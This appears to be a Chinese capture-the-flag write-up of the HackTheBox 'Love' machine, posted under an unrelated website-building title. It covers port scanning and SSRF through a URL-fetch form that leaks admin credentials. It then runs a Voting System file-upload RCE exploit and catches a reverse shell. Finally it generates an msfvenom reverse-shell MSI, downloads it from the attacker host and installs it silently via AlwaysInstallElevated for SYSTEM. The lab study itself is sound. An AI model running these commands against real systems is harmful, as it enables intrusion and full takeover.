當前位置：首頁 > news >正文

企業(yè)做定制網站的好處自助建站免費建站平臺

news 2025/7/1 4:50:05

企業(yè)做定制網站的好處,自助建站免費建站平臺,商城網站建設協議,競價廣告推廣目錄連接至HTB服務器并啟動靶機信息收集使用rustscan對靶機TCP端口進行開放掃描使用nmap對靶機開放端口進行腳本、服務掃描使用瀏覽器訪問靶機443端口嘗試利用該功能訪問靶機自身80端口使用ffuf對靶機80端口進行路徑FUZZ 漏洞利用使用searchsploit搜索靶機80端…

連接至HTB服務器并啟動靶機

信息收集

使用rustscan對靶機TCP端口進行開放掃描

使用nmap對靶機開放端口進行腳本、服務掃描

使用瀏覽器訪問靶機443端口

嘗試利用該功能訪問靶機自身80端口

使用ffuf對靶機80端口進行路徑FUZZ

漏洞利用

使用searchsploit搜索靶機80端口WebAPP漏洞

將需要利用的各個URL進行修改，靶機并不存在votesystem路徑

USER_FLAG：8d5c2780dfa8f56cc7fd8ed6b62ac9f1

特權提升

將攻擊機中的winpeas64.exe進行下載

使用msfvenom生成一個msi木馬

ROOT_FLAG：16d697353a194abcbbe52226a00e8ad9

連接至HTB服務器并啟動靶機

靶機IP：10.10.10.239

分配IP：10.10.16.9

信息收集

使用rustscan對靶機TCP端口進行開放掃描

rustscan -a 10.10.10.239 -r 1-65535 --ulimit 5000 | tee res.txt

提取出端口號

ports=$(grep syn-ack res.txt | awk -F '/' '{print $1}' | paste -s -d ',')

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep syn-ack res.txt | awk -F '/' '{print $1}' | paste -s -d ',')
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# echo $ports
80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670

使用nmap對靶機開放端口進行腳本、服務掃描

nmap -p$ports -sCV 10.10.10.239

使用nmap對靶機UDP常用端口進行開放掃描

nmap -sU --top-ports 20 -Pn 10.10.10.239

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# nmap -sU --top-ports 20 -Pn 10.10.10.239??????? ?
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-28 02:19 EST
Nmap scan report for 10.10.10.239
Host is up (0.071s latency).

PORT????? STATE???????? SERVICE
53/udp??? open|filtered domain
67/udp??? open|filtered dhcps
68/udp??? closed??????? dhcpc
69/udp??? closed??????? tftp
123/udp?? closed??????? ntp
135/udp?? closed??????? msrpc
137/udp?? open|filtered netbios-ns
138/udp?? open|filtered netbios-dgm
139/udp?? closed??????? netbios-ssn
161/udp?? closed??????? snmp
162/udp?? open|filtered snmptrap
445/udp?? closed??????? microsoft-ds
500/udp?? open|filtered isakmp
514/udp?? open|filtered syslog
520/udp?? open|filtered route
631/udp?? open|filtered ipp
1434/udp? closed??????? ms-sql-m
1900/udp? open|filtered upnp
4500/udp? open|filtered nat-t-ike
49152/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 19.32 seconds

使用瀏覽器訪問靶機443端口

點擊左下角的"查看證書"按鈕查看該IP綁定域名

將該域名與靶機IP寫入hosts文件中

sed -i '1i 10.10.10.239 staging.love.htb' /etc/hosts

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.10.239 staging.love.htb' /etc/hosts
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# head -n 1 /etc/hosts???? ?
10.10.10.239 staging.love.htb

訪問該域名后點擊左上角的Demo

這里是一個允許直接與URL交互的表單

攻擊機本地開啟一個http服務

php -S 0:8888

嘗試利用該頁訪問攻擊機8888端口

本地成功收到了回顯，證明該接口是可以出網的

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# php -S 0:8888
[Thu Nov 28 08:21:53 2024] PHP 8.2.24 Development Server (http://0:8888) started
[Thu Nov 28 08:22:41 2024] 10.10.10.239:50458 Accepted
[Thu Nov 28 08:22:41 2024] 10.10.10.239:50458 [404]: GET / - No such file or directory
[Thu Nov 28 08:22:41 2024] 10.10.10.239:50458 Closing

嘗試利用該功能訪問靶機自身80端口

由顯示可見，與我們直接訪問靶機80端口頁面是一致的

利用該功能訪問靶機自身5000端口

賬戶：admin

密碼：@LoveIsInTheAir!!!!

使用ffuf對靶機80端口進行路徑FUZZ

ffuf -u http://10.10.10.239/FUZZ -w ../dictionary/Common-dir.txt

直接訪問/admin路徑

填入上面拿到的憑證直接進入后臺面板

漏洞利用

使用searchsploit搜索靶機80端口WebAPP漏洞

searchsploit voting system

從中將認證后文件上傳導致的RCE腳本取出

searchsploit -m 49445.py

對該腳本中的URL、USERNAME、PASSWORD、LHOST、LPORT進行配置

首先將靶機IP與其根域名進行綁定

sed -i '1i 10.10.10.239 love.htb' /etc/hosts

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.10.239 love.htb' /etc/hosts
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# head -n 1 /etc/hosts
10.10.10.239 love.htb

將需要利用的各個URL進行修改，靶機并不存在votesystem路徑

本地側nc開始監(jiān)聽

rlwrap -cAr nc -lvnp 1425

運行該EXP

python 49445.py

本地側nc收到回顯

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.239] 50501
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

查找user_flag位置并查看其內容

C:\xampp\htdocs\omrs\images>cd c:\
cd c:\

c:\>dir /s user.txt
dir /s user.txt
?Volume in drive C has no label.
?Volume Serial Number is 56DE-BA30

?Directory of c:\Users\Phoebe\Desktop

11/28/2024? 03:37 AM??????????????? 34 user.txt
?????????????? 1 File(s)???????????? 34 bytes

???? Total Files Listed:
?????????????? 1 File(s)???????????? 34 bytes
?????????????? 0 Dir(s)?? 4,102,651,904 bytes free

c:\>type "c:\Users\Phoebe\Desktop\user.txt"
type "c:\Users\Phoebe\Desktop\user.txt"
8d5c2780dfa8f56cc7fd8ed6b62ac9f1

USER_FLAG：8d5c2780dfa8f56cc7fd8ed6b62ac9f1

特權提升

查看靶機系統(tǒng)中存在的用戶

net user

C:\xampp\htdocs\omrs\images>net user
net user

User accounts for \\LOVE

-------------------------------------------------------------------------------
Administrator??????????? DefaultAccount?????????? Guest?????????????????? ?
Phoebe?????????????????? WDAGUtilityAccount????? ?
The command completed successfully.

查看靶機系統(tǒng)信息

systeminfo

本地側開啟一個http服務

php -S 0:6666

靶機中的cmd切換到powershell

powershell

將攻擊機中的winpeas64.exe進行下載

iwr http://10.10.16.9:6666/winpeas64.exe -O winpeas64.exe

PS C:\Users\Phoebe\Desktop> iwr http://10.10.16.9:6666/winpeas64.exe -O winpeas64.exe
iwr http://10.10.16.9:6666/winpeas64.exe -O winpeas64.exe
PS C:\Users\Phoebe\Desktop> ls
ls

??? Directory: C:\Users\Phoebe\Desktop

Mode???????????????? LastWriteTime???????? Length Name??????????????????????????????????????????????????????????????? ?
----???????????????? -------------???????? ------ ----??????????????????????????????????????????????????????????????? ?
-ar---??????? 11/28/2024?? 3:37 AM???????????? 34 user.txt??????????????????????????????????????????????????????????? ?
-a----??????? 11/28/2024?? 6:16 PM??????? 2424320 winpeas64.exe

直接運行該工具

.\winpeas64.exe

此處可見注冊表項AlwaysInstallElevated已啟用它允許任何用戶以系統(tǒng)身份安裝.msi文件

使用msfvenom生成一個msi木馬

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f msi > shell.msi

靶機將該木馬進行下載

iwr http://10.10.16.9:6666/shell.msi -O shell.msi

本地側nc開始監(jiān)聽

rlwrap -cAr nc -lvnp 4444

靜默安裝該木馬文件

msiexec /qn /i shell.msi

本地側nc收到回顯

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.239] 50504
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

查找root_flag位置并查看其內容

C:\WINDOWS\system32>cd c:\
cd c:\

c:\>dir /s root.txt
dir /s root.txt
?Volume in drive C has no label.
?Volume Serial Number is 56DE-BA30

?Directory of c:\Users\Administrator\Desktop

11/28/2024? 03:37 AM??????????????? 34 root.txt
?????????????? 1 File(s)???????????? 34 bytes

???? Total Files Listed:
?????????????? 1 File(s)???????????? 34 bytes
?????????????? 0 Dir(s)?? 4,095,647,744 bytes free

c:\>type "c:\Users\Administrator\Desktop\root.txt"
type "c:\Users\Administrator\Desktop\root.txt"
16d697353a194abcbbe52226a00e8ad9